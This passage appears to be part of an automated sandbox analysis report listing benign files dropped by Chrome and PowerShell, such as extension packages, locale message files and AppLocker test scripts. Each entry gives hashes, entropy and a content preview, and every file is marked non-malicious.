                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):66
                                                                                                                                                                Entropy (8bit):3.922738348156206
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Shj4WEB8HYXAAhGfyn:Shj2XAAhGK
                                                                                                                                                                MD5:AA9B8B29E3D553EB48973A7FF3D5FEA5
                                                                                                                                                                SHA1:D8F0A1D39C59B4C45406E1481910992F7C23192B
                                                                                                                                                                SHA-256:60D8DD0ECEF5BC2E653E1CE906D4BAF07D56491B39B29F051F414288A84720C3
                                                                                                                                                                SHA-512:A73F7A352CE648BF40EEEB27E3AB3E6FCBF54E7DCE7F5BCD656205B7DBCF00E5A1A1E48B375EA82D4CE7CD7416142E04C22D346566CBF9C661C29377784C6E0E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 1.b4ddbdce4f8d5c080328aa34c19cb533f2eedec580b5d97dc14f74935e4756b7
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\6020_1663202384\manifest.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):122
                                                                                                                                                                Entropy (8bit):4.549343645753808
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:rR6TAulhFphifFwAjTho2Hgz4LAnhtWhFgS18LAn:F6VlMmAjFm8LMggS18LAn
                                                                                                                                                                MD5:441350F2F2F1F5726A84E989F3F9BF91
                                                                                                                                                                SHA1:C9530224671F181AE8ED47DBA82741B8AD920EA9
                                                                                                                                                                SHA-256:3640148F4EADB7D60185671799C27A8C530295076AF9179705EAA6D4C544D627
                                                                                                                                                                SHA-512:5AC785E7F3A35035B4958B2EF33534AB6E0448CDC5A5A881911123545930DAAFF6759AB2AB663327525A496E306CC1C98FD5F0EE079E2C6D92C47FD0CFAB51DE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {. "manifest_version": 2,. "name": "Federated Learning of Cohorts",. "floc_component_format": 3,. "version": "1.0.6".}
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\671955c8-acf7-487f-a135-625440086cfb.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):826470
                                                                                                                                                                Entropy (8bit):7.993386298864445
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:24576:J02eNcg9VZPrwM5S8l4AjrRWYyakv4vE5io5AURoFxpE4:J02czVZsM5FlltWYBkvRiouUeF7E4
                                                                                                                                                                MD5:BB2058E728F79C67137BDFCFCEEC72D4
                                                                                                                                                                SHA1:0AE586E5DD08EA7BECD5618DA868E7FA94910F60
                                                                                                                                                                SHA-256:9107E42F7F892FECD9A0A8CB05FEDAE7D9E045442FB17AF11A77F6F7253B66B7
                                                                                                                                                                SHA-512:E35C7CC13C58748D3A3970BD5DA5D2568220EA939CB16FDB6E68078C198AFF78FDF06BC4EFAF564186FBA82E4E427CDA9EB08CCCC2984E66D725D7388D40244B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........b.._..+.........e..'.q<.iJ............]m.......L.3..O....u{..+..&..;....]..)....b._.Ut._........B.Q.X.C.._....,...x.^........8B..n....}. Q.u;..>6....B......a...Y..j1.<..b...m..@...y..&.".7..+a%{`..|...).:.7j.*k.0...(7...U.4Q.b'.._;.e.z...v.......0..0...*.H............0.......Mbh=.[O}.+..U.KHF(n3.\"...,g.c...6)..(.E...U...#.i.a..:...N.....P...x.O...(mC;|.5.S.{m.aEx...[..fP.i`.y..5..R....v.$......l-m...........e8....:._i..4.r#...@3.F.:...!0...{..s............)v3-....S.G.I.;......c$.*......-...p&..,.......i){G....6.L?.....c............[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..\...`.M..\..3......2g.7.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\73b09082-e0a5-403d-bc04-ab6ac06c3537.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3110
                                                                                                                                                                Entropy (8bit):7.933903341619943
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:0MWjN1CDThRYxENcEvyGF/8WAr6Fv9MFghzqSl:0MWjN1gRYavR8WjMFQzqSl
                                                                                                                                                                MD5:A83A2746B84F1CF573B02965B72ED592
                                                                                                                                                                SHA1:85CC572D6F90029EB99AAFA56297D1BCA494313A
                                                                                                                                                                SHA-256:DF4B53C1C7C48E80753D4945E6EC7847084F51BF57F0ED9D341326C74651D6EC
                                                                                                                                                                SHA-512:C287F479EF572A06FF191C4E9A8A718507C97A2A45CB265D7DC65DD7922B80D36CE7660EC5D7EA9F3D1F1EF71C51C3E4F3D7973754F97A89B4F14D1B1FDE70DE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ............ko.7......J...../..v....... ....zE.\+.T..f..%wW.$........p8/.....z..|a...}.#y.`.l..7Kr..T:'.UE,.&.i..Y............h...B.....gJ....%.\.?.f]1R..@3.jHA..eHi&.Q..`....g.__?'3^...@~X..a8............UN..%...&.F..K19".Y:.).L.L..WL..xxD>.P@ ...&'..j..)%.Q\..<!.3n.<#....;.gd2.LZ....x.m&.e.`&;.KX..."...<G....8.R.jsd....g.)..?.$=UVT...#.+g.!.......R..1..#D.k...3.Bj3iT.....*.M..L....}..S.K.....zi..n.A{......n..o.0j..q...w...3.7.N..].>...zK..sr1#.d..Tk..ckB...<....j.a.M1oe.9.jIQ.y+...6.....]....v.X.......q.....a>...2`.WV.v.'..~.3*.4.'8...hkT.H..9SOIF.%...;n.6.U....i!...2v.9/.;.....R..8.(..L.b....aY2ps% ."...x.V..Y[.h.....^.........U.....p.'.&m.....6..%pWE....:..o.k...<.....5....j.I...*9...f..3.....-..0..D;......*S.td/...........^_.v.)y ..Uf..q>.v2...0....o....Y%5;.5fn..{.......p_......B..V.......D.Y.l....q 3...sm.b..!..E....a. &.w.-.s..>..M_...`.0..k.!<SH...9$.....V.\A$..}..8....#`...,...3.W..k...\..xH.1).~.Y.L1.O...\.....k.....s..i+.....).0
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\7f4122a7-f299-4e97-ac86-0a64ab2e897c.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):248531
                                                                                                                                                                Entropy (8bit):7.963657412635355
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                                                                                                                                MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                                                                                                                                SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                                                                                                                                SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                                                                                                                                SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........\..F!...b...l5....zJ.q.......L].....w[T0.6....E.....r..%Z.vFm.9..5!,.~g5...;.t...']....+A.....u....k...e..&..l.6r[yU...%..f.......N..V.....<+.....l..}.{...z...)y.n..'..).....,.b....5.08K%..O.g..D.S.F5o..<(....>....\f..X..I..2."l...w....7f|.~.c.4.E.......0..0...*.H............0.......).'..b.*$w\$.q&.]zF_2..;...?.U,...W..L1.2...R..#....W.....c1k.$W..$.J....+M!.Hz.n`U.I)N.|b.l....{.K@]6.LlP/....](.A..................I...).H....IQ.y.;MG.d..ix..#f.Z$|..|.?...0K...t"i..s...Y..%.Ky....0...{.!+.~v.;....J.....Z....).(6..@?v.;~..2..c....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. .0...|!..A..L.+.=...kP.!.1..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\8575e93c-1f7c-493f-ae96-1cbd07ff8d92.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2hy1fia.0bf.psm1
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcu5dvth.0ph.ps1
                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60
                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\b946a3cc-4100-404d-8dec-7a7f7ba9c1b0.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\c8024ca9-9417-4840-8bb1-1ac39bfaeb29.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):82480
                                                                                                                                                                Entropy (8bit):7.997257675624181
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:1536:tXOAnotuIHFnQ7yx41gld6L8xo/YovdHZEt6jPi6qMuonT7Xd8u+Kp4d1Uc8q:ttou6uKETLNAovRZEt6jKVMd9BO/z
                                                                                                                                                                MD5:40D74C91FBCB0ACF1DC30524A9D24C06
                                                                                                                                                                SHA1:CF0D403A8B8FEDB851A7A23E021FFE8C86FBFF90
                                                                                                                                                                SHA-256:C2C145ECAFDE13BFBEE93228551D35F7B04A87974CDA5303C5E47D6955AC3976
                                                                                                                                                                SHA-512:3609C7762FC4227CEDB482D191D65FB7C3BAE357F7D66E81B0ABE8B582DBCC5456A0FFC911C017251A1FA3293D1D36196506BFA448E93E16A8CC847D6BC9682A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ...........}.v....?.......$...a4.c'.xI..:.$AJ..h..K..SU.H...w.7.L..E...P...`...Je{8..w...#*..d6...n0.....l...'......_.....L..^$..n..c..5.aG.?.7V.n...&.2....t....9..g.p...l..`b.7.....J..Q)..^.A2.4o..@.....f..Vk/\..X,.,..|.z=..r...pZ.D......H..]1i.._.Y.X.B.......c~]....!.:.C..&:.......N..}....;...5.2..&.a.{.;.I..=3. /..hxY........U...M..kh{.pl..0..j......y...Z...|..}.........3.CQ.6......5RuUT..oe."..B....8a..;p.....>.OF...._.5..Fi[.7..V.....Z.j.J.Z.8.X.s....[...2[Y..A2o{......~T..f...T...C...p8...l......w..Y.d.p..o%.ur...=........Dx.]..A..._x...."1....Q.}..C.. #..tx.3p...K..$..,2ZC.E.@.d..!.M..a....G(\...k.`q.y.Z..~.N.c.0U...l.l..........0.,.Y...jL@.U.h..w.b..;..}....1...\..L..O...v..G"J.6.f..3$?~.%....._.>..KSq.r...._.z...v#..V...m..dz..Yf.ij6.@.D.F..Hw.::..j..U;.....`S;Env3.WS./.........s..J...1...k..&..(`P"Y..@..(.l[.Zhc...l]z...!...`W....Xa?..-...14..b..2...h..U;....SGA.9a}4.t.@J..(:.P...p!0..h...e..c.c.>....;...t...'b.^.>..s.~
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\e5fb32b8-1da2-494b-8034-fc1022272e92.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):28748
                                                                                                                                                                Entropy (8bit):7.9918576871001425
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:384:SU7ZPeF1W3JgUrqaO/8dOcbwy59NjS5BMYGYycIfPhrVx2NtsEeSeFzVXe/rxd:H7peFkZL9RZSz3gnhhGcpXetd
                                                                                                                                                                MD5:2A37AD0EC191D53104BB46953AC6C43C
                                                                                                                                                                SHA1:FD23FFC5B7E4A6B45FBD88A486D15FAA51DC07AE
                                                                                                                                                                SHA-256:51F075EB69486CB23B32A0776782B4A1B2AF204429AB94510469E02B115E56CC
                                                                                                                                                                SHA-512:AEB91CB7902A800D7B0C43627EC2B52121BC41BA29A1B6ABEDBFCFA4802254A0594ED239EA7A3F8D40241E43D436428D1E4AC117BD97269D78460F82F9BDCF68
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ...........Zms.6..._..p..[.(.b[...M....N{..t ...S.......v...H.q.g:....]...p..6I8_d...C.\p.X$.2.p.g.8I}8.".D)$<..O...}.J9.3..a.i.'...x.....5O...x......I.M.!.'\.l.2.0.cN.fq....\......7..,......>.p...w&.KS.......(O.V>......O.r..V~J.`....U(..Y..MIy..w..g0e......D.,L..y..N.+..._....O.h.]...V....r................O.|.:....Li..>COy......N.h.......R....Q%.,Xr.y...G8=.A....!8(..L....c....sA....t.Vl:...v...G;...^.l...#.t.>...k..d..kr...B......Pb.0*..!..;9.....:~....j;....j.*O..!B......?....^.]....;...[.g.B...%..'.7;.9.>..gP. p8...:.5l.Y.....Jp..R,.?..b..8O......h.X(..G.).Cz.C..%....x.ET.....AEi.../..0.. ....k.*t...wl..e...H.i.F.....?.....z...?..........(../.O..R.?.4..7...j ..Q.....l..ob!..A..j...@..!).....K...MW.U.N.......W..Bh'8.'.y....Y.[o...PI..W.*...i...r.e..=.k^.WC..Uy.j..687^.z.#u5.4O...........-j.j3..L.1..F...8.......@l.9.c.aGC.R.&..j.Q-av?...[4.E..T8....u..+9.<.n.Qw.D..N..S..3.D...... .%C.j.7.Y.s(.0wq.ZI.#''#..[K.GJ ....4.....?
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\f64029a0-8ca6-441c-8a7b-7b97fed1edb1.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):5168
                                                                                                                                                                Entropy (8bit):7.956694278195136
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:HLCk5oNLp/f4PvzusAnSWuaGqLiWuGVaNhZMHd0NJHp9873PDqQ7:H2vUv7AnSKnaNPM+4uA
                                                                                                                                                                MD5:3E5CCD9B583763AF68E28C5101373167
                                                                                                                                                                SHA1:2005CDC0A8070B65E321A197D576698ECC267496
                                                                                                                                                                SHA-256:41412C0863920BA95E9FDBD3AF000CBE926A73C078997A233DF55379A5C4D274
                                                                                                                                                                SHA-512:04BF4F7320326B085C40527797577D8770A30A1ED24A8587A000A5AE1D8F39E0B7F187DB14603295AC7A2901A4698683CC3BED2C2611539293A1927AB31BEAE1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: ...........[ks.8..._.........#..,.G..8.;.55;.%..&5$e...... )..d.._...%.....s.....+..Uv}...]rq......luK.).zJh..3.&..Uu...W...s.H. .MV..\U3Ef.\.|...TU.9.z )I...u.+.g3U`Zs.6d...JiJ.rU.IV.".'L|8.d..j.J..q.....O."..<,...n...~|E.dV.u.O..'"...e.uyJ?..?]~.?.......M.,.7...j.,.fz].. >+o.gz....<^(5.Jg_.Ap.U.i............?.8....,..*.*./.iQ..8......A.DO/....?.~..N.~a.-..g.N~.......o.^...L.mW.]:{....../........[VkTu[wki.gK...;-.<...\.".3]..}V...)9i.V.P="m?......V.i...7..S.U.d..(..\....g....bU.....}........P9$.A...N..ckV..Qz..A....7..{pd.f.7....}6on.....7J;...Y..l>W...H.Z.........j.......Wk9vj+V.W.zAm.....P.oYo..|........}.g.^.p...Z....l%cT|LN3..H......{...~.J.%.!k.(.)..."....q.%.V.. d..MZ.`......o..m3....1.../..jeH........Q....X...j..o..|.o.r..nVw._...9 .......o...l....!...{....xU5..}.x.I..3.vT%z.k..o..........^.S*.t(....+r\.u<...G.`.........g...r..?...}7.=.....c~.F.e..w.v$sC/.B.p.D~..J...:....7Vl3w...s.-"......]+..KO.~....%.I..?.&.o...\?.9..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\671955c8-acf7-487f-a135-625440086cfb.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):826470
                                                                                                                                                                Entropy (8bit):7.993386298864445
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:24576:J02eNcg9VZPrwM5S8l4AjrRWYyakv4vE5io5AURoFxpE4:J02czVZsM5FlltWYBkvRiouUeF7E4
                                                                                                                                                                MD5:BB2058E728F79C67137BDFCFCEEC72D4
                                                                                                                                                                SHA1:0AE586E5DD08EA7BECD5618DA868E7FA94910F60
                                                                                                                                                                SHA-256:9107E42F7F892FECD9A0A8CB05FEDAE7D9E045442FB17AF11A77F6F7253B66B7
                                                                                                                                                                SHA-512:E35C7CC13C58748D3A3970BD5DA5D2568220EA939CB16FDB6E68078C198AFF78FDF06BC4EFAF564186FBA82E4E427CDA9EB08CCCC2984E66D725D7388D40244B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: Cr24..............0.."0...*.H.............0...........\7c.<........Fto.8.2'5..qk...%....2...C.F.9.#..e.xQ.......[...L|....3>/....u.:T.7...(.yM...?V.<?........1.a...O?d.....A.H..'.MpB..T.m..Vn Ip..>k.|1..n.<Fb..f..*Q1.....s..2..{*.6....Pp....obM..1.......b1.......(.u^.'z......v.F.W.X4."-*eu...b.........b.._..+.........e..'.q<.iJ............]m.......L.3..O....u{..+..&..;....]..)....b._.Ut._........B.Q.X.C.._....,...x.^........8B..n....}. Q.u;..>6....B......a...Y..j1.<..b...m..@...y..&.".7..+a%{`..|...).:.7j.*k.0...(7...U.4Q.b'.._;.e.z...v.......0..0...*.H............0.......Mbh=.[O}.+..U.KHF(n3.\"...,g.c...6)..(.E...U...#.i.a..:...N.....P...x.O...(mC;|.5.S.{m.aEx...[..fP.i`.y..5..R....v.$......l-m...........e8....:._i..4.r#...@3.F.:...!0...{..s............)v3-....S.G.I.;......c$.*......-...p&..,.......i){G....6.L?.....c............[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..\...`.M..\..3......2g.7.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\am\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17307
                                                                                                                                                                Entropy (8bit):5.461848619761356
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:arfbEVrFvMP4rMhuDopC3vUuFBYZV6uml:aHEVrFvMP4KuFvr6D6uml
                                                                                                                                                                MD5:26330929DF0ED4E86F06C00C03F07CE3
                                                                                                                                                                SHA1:478F3B7E7A7E007BEE182B89C2EF6FFE6045E92C
                                                                                                                                                                SHA-256:621B5139ED199022BB6529AF18ED4DC312AE9F3E90ECAF3B2C9E1D12114F5B22
                                                                                                                                                                SHA-512:0BE6183A1BF12575C0F99960705D4249E79CDB8528C55FF132BE99A111F09494231AD6A36CD61B090A3B34C6971D68A29373BA346888E852C52E05DC14380682
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": "...... ... ..... .. ...... .... ... .... ......?".. },.. "128276876460319075": {.. "message": "..... ...".. },.. "1428448869078126731": {.. "message": ".... ......".. },.. "1522140683318860351": {.. "message": "..... ....... .... ..... .....".. },.. "1550904064710828958": {.. "message": "....".. },.. "1636686747687494376": {.. "message": "... ...".. },.. "1802762746589457177": {.. "message": "...".. },.. "1850397500312020388": {.. "message": ".$START_LINK$Google Home .......$END_LINK$ ... ...... Chromecast ..... .....? $START_SPAN$*$END_SPAN$",.. "placeholde
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ar\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16809
                                                                                                                                                                Entropy (8bit):5.458298990148825
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:0IprKC78JmUjk8RkeryFOYPATxLZ8fsbEYIFV6c8TEKdl:Jrp8JjA8RkerK0lcTFV6uml
                                                                                                                                                                MD5:39CB048A1AE1097F992F57DF500F07F9
                                                                                                                                                                SHA1:C15EC37DA4DE26F36A2D71CB258CDC2C8601DB35
                                                                                                                                                                SHA-256:41E4D45AF5B70DD25C7C368BFB8B947C7DA8738DD76BD6D60E5B59328F4828EB
                                                                                                                                                                SHA-512:096EBEDF7FE9F2C8D1E50008990624A26C9A9A5CF35A8BE7596CF439C75B842ADAD5115C541ECC814298E4D6F7E5153591EEA800899B57852C7494CE757BCFBB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".....".. },.. "1213957982723875920": {.. "message": ".. .. ........ ....... .... .... ... .......".. },.. "128276876460319075": {.. "message": "...... .......".. },.. "1428448869078126731": {.. "message": "..... .......".. },.. "1522140683318860351": {.. "message": "..... ........ .... ........ ... .....".. },.. "1550904064710828958": {.. "message": "...".. },.. "1636686747687494376": {.. "message": "......".. },.. "1802762746589457177": {.. "message": "..... .....".. },.. "1850397500312020388": {.. "message": "... ....... .. .... Chromecast .. $START_LINK$..... Google Home$END_LINK$. $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\bg\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):18086
                                                                                                                                                                Entropy (8bit):5.408731329060678
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:4jjpr342SIwPIasR9VhMkACVmrv8evj+3eXivOMbb2vVzCkwRV6V6c8TEKdl:4ZrYo+rxT+qOV6V6uml
                                                                                                                                                                MD5:6911CE87E8C47223F33BEF9488272E40
                                                                                                                                                                SHA1:980398F076BB7D451B18D7FDE2DE09041B1F55AD
                                                                                                                                                                SHA-256:273DEF0F67F0FA080802B85EF6F334DE50A19408F46BDF41F0F099B1F5501EEA
                                                                                                                                                                SHA-512:CDB69405BB553E46DCF02F71B1A394307D0051E7FA662DFFEBA7888F30DD933F13C7FD6E32F1D7AEAEE8746316873B6E1D92029724ABDC75E49DCC092172EA22
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": ".......".. },.. "1213957982723875920": {.. "message": "... .. ........ ......... ...... ...-..... ....... ..?".. },.. "128276876460319075": {.. "message": "......... .. ..........".. },.. "1428448869078126731": {.. "message": "........ .. .........".. },.. "1522140683318860351": {.. "message": "........... .. .. ........ ...., ........ .......".. },.. "1550904064710828958": {.. "message": "......".. },.. "1636686747687494376": {.. "message": ".......".. },.. "1802762746589457177": {.. "message": ".... .. .....".. },.. "1850397500312020388": {.. "message": "....... .. ............ .. Chromecast . $START_LINK$............ Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "p
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\bn\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):19695
                                                                                                                                                                Entropy (8bit):5.315564774032776
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:PrUCrcTIOeswIW/Vre/sZn8TFfzheV6uml:lPswIWtoK8xfG6uml
